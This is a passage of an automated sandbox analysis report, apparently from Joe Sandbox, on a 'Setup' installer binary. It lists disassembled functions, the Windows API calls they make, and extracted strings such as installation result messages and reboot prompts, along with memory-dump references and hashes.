                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,6397677E,000000FF), ref: 63960E15
                                                                                                • Part of subcall function 6395F8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 6395F91E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3H_prolog3_IndirectObject
                                                                                              • String ID:
                                                                                              • API String ID: 2777900791-0
                                                                                              • Opcode ID: 82100d28dd2233a3da15e04b0a21cbd686e08abde2d58f3cd337cb70a212bf69
                                                                                              • Instruction ID: 5d0d94713792e4db6a63c80f0bbcb3c8856859f9b6476cefb3944ac3048e9fa5
                                                                                              • Opcode Fuzzy Hash: 82100d28dd2233a3da15e04b0a21cbd686e08abde2d58f3cd337cb70a212bf69
                                                                                              • Instruction Fuzzy Hash: 4E02F375A00208AFDB04DFA8C998A9DBBF6FF8E711B148059F506AB361DB35E941CF50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63958A21
                                                                                              • GetTickCount.KERNEL32 ref: 63958A38
                                                                                                • Part of subcall function 63958C2A: __EH_prolog3.LIBCMT ref: 63958C31
                                                                                              • GetTickCount.KERNEL32 ref: 63958A52
                                                                                              • SetWindowTextW.USER32(?,?), ref: 63958A99
                                                                                              • GetDlgItem.USER32(?,0000006F), ref: 63958AC3
                                                                                              • GetDlgItem.USER32(?,00000070), ref: 63958AE5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountH_prolog3ItemTick$TextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3171788341-0
                                                                                              • Opcode ID: 15319ebdb278448bc955440ca8ae8efcc1baf19b7cdccceb389cac389f341670
                                                                                              • Instruction ID: 96708500d3b4583d6219b1ac76d0d534f1c8e1cdc8b4dea8013d92f12d735a86
                                                                                              • Opcode Fuzzy Hash: 15319ebdb278448bc955440ca8ae8efcc1baf19b7cdccceb389cac389f341670
                                                                                              • Instruction Fuzzy Hash: 9B61F275A006069FDB04EFB4C998AAEBBB5BF09704F100968F156EB3A1DB34E914CF51
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D46A1
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 6C5D46B4
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6C5D46CD
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6C5D46DF
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              • GetLastError.KERNEL32 ref: 6C5E0A56
                                                                                              • GetLastError.KERNEL32 ref: 6C5E0A93
                                                                                              • GetLastError.KERNEL32 ref: 6C5E0ABD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateEvent$CloseCountCriticalInitializeOpenQuerySectionSpinValuememset
                                                                                              • String ID: SamplingInterval$Software\Microsoft\SQMClient
                                                                                              • API String ID: 171072326-987520630
                                                                                              • Opcode ID: 0e7466a666d84dba2b981db935d0d4e1a97ab7f1ea00846361ecae78fe14d5e6
                                                                                              • Instruction ID: 8f78fb78cb8142cffc525c9f5ba55e99de4c768d289f2909a2b18f5f639dcea2
                                                                                              • Opcode Fuzzy Hash: 0e7466a666d84dba2b981db935d0d4e1a97ab7f1ea00846361ecae78fe14d5e6
                                                                                              • Instruction Fuzzy Hash: 3F817F70600394AFD724CF198C84FAABBF9FB85748F15085EE165D6AA0C7B0E945CF18
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957390
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394C9BB: __EH_prolog3.LIBCMT ref: 6394C9C2
                                                                                                • Part of subcall function 6394D1B4: __EH_prolog3.LIBCMT ref: 6394D1BB
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63957420
                                                                                                • Part of subcall function 6396DBDB: RaiseException.KERNEL32(?,?,63969236,?,?,?,?,?,63969236,?,63977F54,639822B4), ref: 6396DC1D
                                                                                                • Part of subcall function 6395EB56: __wcsicoll.LIBCMT ref: 6395EB74
                                                                                              • __aulldiv.LIBCMT ref: 639574F1
                                                                                              • __aulldiv.LIBCMT ref: 639574FD
                                                                                              Strings
                                                                                              • %I64u, xrefs: 6395748A
                                                                                              • $$DownloadSizeEstimate$$, xrefs: 63957436
                                                                                              • $$DownloadTimeOverDialup$$, xrefs: 63957523
                                                                                              • Setup engine failed to initialize. engineDataProvider.InitializeItems() returned false, xrefs: 639573B2
                                                                                              • $$DownloadTimeOverBroadband$$, xrefs: 639574B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__aulldiv$ExceptionException@8RaiseThrow__wcsicoll
                                                                                              • String ID: $$DownloadSizeEstimate$$$$$DownloadTimeOverBroadband$$$$$DownloadTimeOverDialup$$$%I64u$Setup engine failed to initialize. engineDataProvider.InitializeItems() returned false
                                                                                              • API String ID: 1088788417-581573194
                                                                                              • Opcode ID: 4cde9425fcee9369d914659f09bfffa738b95ffd58549d3c33d12b892259bacc
                                                                                              • Instruction ID: c151015feb703caa7321a6d626bb103550c022ea287db8f9c11518cb702a6bcc
                                                                                              • Opcode Fuzzy Hash: 4cde9425fcee9369d914659f09bfffa738b95ffd58549d3c33d12b892259bacc
                                                                                              • Instruction Fuzzy Hash: F151D571D003089FEB10CFA4C844BAEB7F9AF51B68F148555F555AB282DB30DB508FA1
                                                                                              APIs
                                                                                              • SysStringLen.OLEAUT32(?), ref: 6394C7FD
                                                                                              • __time64.LIBCMT ref: 6394C8B6
                                                                                                • Part of subcall function 6394C280: __EH_prolog3.LIBCMT ref: 6394C287
                                                                                                • Part of subcall function 6394C280: OutputDebugStringW.KERNEL32(?,?,?,00000008,6394C856), ref: 6394C2A8
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6394C894
                                                                                              Strings
                                                                                              • Final Result: Installation aborted, xrefs: 6394C827, 6394C835
                                                                                              • Final Result: Installation completed successfully with success code: (0x%08lX), xrefs: 6394C80C
                                                                                              • Final Result: Installation completed successfully with success code: (0x%08lX), "%s", xrefs: 6394C818
                                                                                              • Final Result: Installation failed with error code: (0x%08lX), xrefs: 6394C869
                                                                                              • Final Result: Installation failed with error code: (0x%08lX), "%s", xrefs: 6394C87E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$DebugFreeH_prolog3Output__time64
                                                                                              • String ID: Final Result: Installation aborted$Final Result: Installation completed successfully with success code: (0x%08lX)$Final Result: Installation completed successfully with success code: (0x%08lX), "%s"$Final Result: Installation failed with error code: (0x%08lX)$Final Result: Installation failed with error code: (0x%08lX), "%s"
                                                                                              • API String ID: 1943088043-1330816492
                                                                                              • Opcode ID: c831666d2c174528583442e0a8d2a69aa3d665bfa024bab4d9c6dc7cc99b4780
                                                                                              • Instruction ID: 415f304823732d3f0954e24279b8041b5bc586aa033bbb78eae45d61cff0c010
                                                                                              • Opcode Fuzzy Hash: c831666d2c174528583442e0a8d2a69aa3d665bfa024bab4d9c6dc7cc99b4780
                                                                                              • Instruction Fuzzy Hash: 2151617150C341AFD310DF78D984A4BBBE9EF96B28F040A1DF49197292D731D9188FA2
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957962
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • EnumWindows.USER32(63957C3F,?), ref: 639579BF
                                                                                                • Part of subcall function 63957BC5: _calloc.LIBCMT ref: 63957BE6
                                                                                                • Part of subcall function 63957AC7: __EH_prolog3.LIBCMT ref: 63957ACE
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 63957ABB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$EnumExceptionRaiseWindows_calloc
                                                                                              • String ID: complete$Action$Blocking Processes$Enumerating incompatible processes$No Blocking Processes$[ProcessID] [ImageName] [WindowTitle] [WindowVisible]
                                                                                              • API String ID: 3326300193-1989790735
                                                                                              • Opcode ID: 48a9313a351e26a60fb27dc8217625b900abec77899462278536b3e7f835aaba
                                                                                              • Instruction ID: a4d5b136db9a54c8bde892a7237d9330930523dbaedefadbb19d66c17b4328f1
                                                                                              • Opcode Fuzzy Hash: 48a9313a351e26a60fb27dc8217625b900abec77899462278536b3e7f835aaba
                                                                                              • Instruction Fuzzy Hash: 4B418F71900249EFEB01DFA8C884F9DBBB5AF59B28F148449F544EB282C771DA818F61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395C62D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 6395C63D
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00000000), ref: 6395C666
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 6395C6A1
                                                                                              • SetDlgItemTextW.USER32(?,00000002,00000000), ref: 6395C6DC
                                                                                              • GetParent.USER32(?), ref: 6395C6EF
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E179
                                                                                                • Part of subcall function 6394E153: GetParent.USER32 ref: 6394E18B
                                                                                                • Part of subcall function 6394E153: GetWindowRect.USER32(?,?), ref: 6394E1A5
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E1BB
                                                                                                • Part of subcall function 6394E153: MonitorFromWindow.USER32(?,00000002), ref: 6394E1DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$Text$Item$H_prolog3LongParent$FromMonitorRect
                                                                                              • String ID: IDS_REBOOT_REQUIRED$IDS_RESTART_LATER$IDS_RESTART_NOW
                                                                                              • API String ID: 1194771093-931079857
                                                                                              • Opcode ID: 710843fc2d265148980eae688a5c12cb71d96d2e5bcd559bb6ce9d095a26a011
                                                                                              • Instruction ID: 23a50821f549572d227f65dbcd7eae3aa1d4ad473281429c4096360c34aaaf1b
                                                                                              • Opcode Fuzzy Hash: 710843fc2d265148980eae688a5c12cb71d96d2e5bcd559bb6ce9d095a26a011
                                                                                              • Instruction Fuzzy Hash: BC313E71900205DFDF10EFA8C888A9D7BB5FF4AB29B244698F155DB2A5C7319950DF10
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 63961656
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 6396175E
                                                                                              • ShowWindow.USER32(00000001,00000001,?,?,?,?,40000000,?,?,00000000), ref: 639617E3
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 639617F5
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6394F5AC
                                                                                                • Part of subcall function 6394F589: GetObjectW.GDI32(00000000,0000005C,?), ref: 6394F5B5
                                                                                                • Part of subcall function 6394F589: CreateFontIndirectW.GDI32(?), ref: 6394F600
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6394F610
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 639618AD
                                                                                              • SendMessageW.USER32(?,00000170,?,00000000), ref: 639618FA
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 63961931
                                                                                                • Part of subcall function 6395F933: SendMessageW.USER32(?,00000172,00000000,?), ref: 6395F944
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63961A58
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 63961ABD
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000), ref: 63961AC8
                                                                                                • Part of subcall function 6395F8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 6395F91E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3IndirectObject
                                                                                              • String ID:
                                                                                              • API String ID: 727718542-0
                                                                                              • Opcode ID: 525b5b38c515de5c1cbe4a1c550a1ad2c9527e77c760fb668d70460685cd44b1
                                                                                              • Instruction ID: a7ed2a0d309b16757171883aff79504414b2d098cb5ef550112d21c4071174a5
                                                                                              • Opcode Fuzzy Hash: 525b5b38c515de5c1cbe4a1c550a1ad2c9527e77c760fb668d70460685cd44b1
                                                                                              • Instruction Fuzzy Hash: C702F075608300AFDB05DF68C888A1ABBE6FF8AB14F104959F586CB361DB35D845CF92
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6396215F
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63962267
                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,40000000,?,?,00000000), ref: 639622ED
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 639622FF
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6394F5AC
                                                                                                • Part of subcall function 6394F589: GetObjectW.GDI32(00000000,0000005C,?), ref: 6394F5B5
                                                                                                • Part of subcall function 6394F589: CreateFontIndirectW.GDI32(?), ref: 6394F600
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6394F610
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 639623BB
                                                                                              • SendMessageW.USER32(?,00000170,?,00000000), ref: 63962408
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 6396243C
                                                                                                • Part of subcall function 6395F933: SendMessageW.USER32(?,00000172,00000000,?), ref: 6395F944
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 6396255F
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 639625C4
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000), ref: 639625CF
                                                                                                • Part of subcall function 6395F8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 6395F91E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3IndirectObject
                                                                                              • String ID:
                                                                                              • API String ID: 727718542-0
                                                                                              • Opcode ID: 6fd871d160e8d5ef97d0e0b775574b5bc39f911a42c173c5badf6ac379a38e5b
                                                                                              • Instruction ID: c06623219eb599fb2bc56cfdfa925eb67e7624b78ea65b3e7794c4997fc77f05
                                                                                              • Opcode Fuzzy Hash: 6fd871d160e8d5ef97d0e0b775574b5bc39f911a42c173c5badf6ac379a38e5b
                                                                                              • Instruction Fuzzy Hash: D10212756083019FDB04DF68C898A1ABBF6FF8A754F004969F5868B361DB30D844CF92
                                                                                              APIs
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,?,00000000), ref: 6C5D1AB1
                                                                                              • _initterm.MSVCRT ref: 6C5D1AF8
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1B0E
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,00000001,00000000), ref: 6C5D1D46
                                                                                              • free.MSVCRT ref: 6C5D1D7A
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1D9C
                                                                                              • Sleep.KERNEL32(000003E8,?,00000000,?,?,6C5D1DDB,?,00000001,?,?,?,?,6C5D1C70,0000002C), ref: 6C5E451B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ExchangeInterlocked$Compare$Sleep_inittermfree
                                                                                              • String ID:
                                                                                              • API String ID: 546057305-0
                                                                                              • Opcode ID: 95a52fff75cf025f7bf7a632f69a7114fcd20feda4c623dbdf38b750eed5c5f7
                                                                                              • Instruction ID: ec77ffa72cba2d1c982e4ab2d3e1360f57f97aea3810c844c347730c318e670d
                                                                                              • Opcode Fuzzy Hash: 95a52fff75cf025f7bf7a632f69a7114fcd20feda4c623dbdf38b750eed5c5f7
                                                                                              • Instruction Fuzzy Hash: 83418E71345340EBEB04ABA99C44B5B33B9EB86379F16452AE521CA991E730E840CF2D
                                                                                              APIs
                                                                                                • Part of subcall function 63961169: __EH_prolog3.LIBCMT ref: 63961170
                                                                                                • Part of subcall function 63961169: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 639611B1
                                                                                                • Part of subcall function 639610EB: __EH_prolog3_GS.LIBCMT ref: 639610F5
                                                                                                • Part of subcall function 639610EB: _memset.LIBCMT ref: 63961121
                                                                                                • Part of subcall function 639610EB: GetTempPathW.KERNEL32(00000104,?,Action,?,00000000), ref: 63961135
                                                                                                • Part of subcall function 6395E98E: __EH_prolog3_GS.LIBCMT ref: 6395E995
                                                                                                • Part of subcall function 6395E98E: _wmemcpy_s.LIBCMT ref: 6395EA2A
                                                                                                • Part of subcall function 6395F0E8: __EH_prolog3.LIBCMT ref: 6395F0EF
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63957FE0: __EH_prolog3.LIBCMT ref: 63957FE7
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?,?,?,00000014,63959180,?,?,?,?,?,?,?,?), ref: 63958015
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?), ref: 6395801C
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?,?,?,?), ref: 63958064
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?), ref: 6395806B
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(00000001,00000001,?,?), ref: 639580B3
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?), ref: 639580BA
                                                                                                • Part of subcall function 63958ECA: __EH_prolog3.LIBCMT ref: 63958ED1
                                                                                                • Part of subcall function 63958ECA: GetDlgItem.USER32(?,0000004E), ref: 63958F73
                                                                                                • Part of subcall function 63958ECA: GetDlgItem.USER32(?,?), ref: 63958F88
                                                                                                • Part of subcall function 63958CD7: __EH_prolog3.LIBCMT ref: 63958CDE
                                                                                                • Part of subcall function 6395F42A: __EH_prolog3.LIBCMT ref: 6395F431
                                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,00000065,00000067), ref: 6395929E
                                                                                              • ShowWindow.USER32(205ABF9D,00000000,?,?,?,?,?,?,00000065,00000067), ref: 639592B0
                                                                                              • ShowWindow.USER32(?,00000000,?,00000066,00000068,?,?,?,?,?,?,?,?,?,?,?), ref: 63959335
                                                                                              • ShowWindow.USER32(00000012,00000000,?,00000066,00000068,?,?,?,?,?,?,?,?,?,?,?), ref: 63959347
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Path$DriveNumber$ShowWindow$H_prolog3_Item$DirectorySystemTemp_memset_wmemcpy_s
                                                                                              • String ID: Action$Download Drive$Product Drive$System Drive
                                                                                              • API String ID: 1601511689-2973646315
                                                                                              • Opcode ID: 94a16aa9fc3e2edc6a4a8186c34838e13c8a31f014b4bf0e7f2ce99582e14ac5
                                                                                              • Instruction ID: df6dcb910fcbef326b7af7198fca7aa65fa6bad51b82636109f3b20f091f7fdd
                                                                                              • Opcode Fuzzy Hash: 94a16aa9fc3e2edc6a4a8186c34838e13c8a31f014b4bf0e7f2ce99582e14ac5
                                                                                              • Instruction Fuzzy Hash: ABC13D715083409FD710DB78C884B5EB7E8BF9AB28F044A59F999DB291CB31D854CFA2
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639521BF
                                                                                                • Part of subcall function 63951F81: __EH_prolog3.LIBCMT ref: 63951F88
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                                • Part of subcall function 6394CAC2: __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                                • Part of subcall function 6394D170: __EH_prolog3.LIBCMT ref: 6394D177
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63952425
                                                                                                • Part of subcall function 6396DBDB: RaiseException.KERNEL32(?,?,63969236,?,?,?,?,?,63969236,?,63977F54,639822B4), ref: 6396DC1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                              • String ID: Bitmap$Font$Icon$Text$UIInfo.xml$UiInfo element 'Static' should have one of Text, Icon or Bitmap elements!
                                                                                              • API String ID: 1412866469-225342085
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639593C5
                                                                                                • Part of subcall function 6395795B: __EH_prolog3.LIBCMT ref: 63957962
                                                                                                • Part of subcall function 6395795B: EnumWindows.USER32(63957C3F,?), ref: 639579BF
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000000), ref: 639594F0
                                                                                                • Part of subcall function 6395F42A: __EH_prolog3.LIBCMT ref: 6395F431
                                                                                              • SendDlgItemMessageW.USER32(00000001,0000006F,00000172,00000001,?), ref: 63959509
                                                                                              • SetWindowTextW.USER32(?,?), ref: 63959518
                                                                                              • EnableWindow.USER32(?,00000001), ref: 6395952C
                                                                                              • EnableWindow.USER32(?,00000000), ref: 6395953D
                                                                                              • ShowWindow.USER32(?,00000000), ref: 6395954A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$H_prolog3$Enable$EnumExceptionItemMessageRaiseSendShowTextWindows
                                                                                              • String ID: %s
                                                                                              • API String ID: 3119945384-3043279178
                                                                                              APIs
                                                                                              • GetStartupInfoW.KERNEL32(639414A0,639691D6), ref: 6396A31E
                                                                                              • __calloc_crt.LIBCMT ref: 6396A32A
                                                                                                • Part of subcall function 63969F70: Sleep.KERNEL32(00000000,?,639691D6,?), ref: 63969F98
                                                                                              • __calloc_crt.LIBCMT ref: 6396A3CA
                                                                                              • GetFileType.KERNEL32(74C08559,00000001,639691D6), ref: 6396A451
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
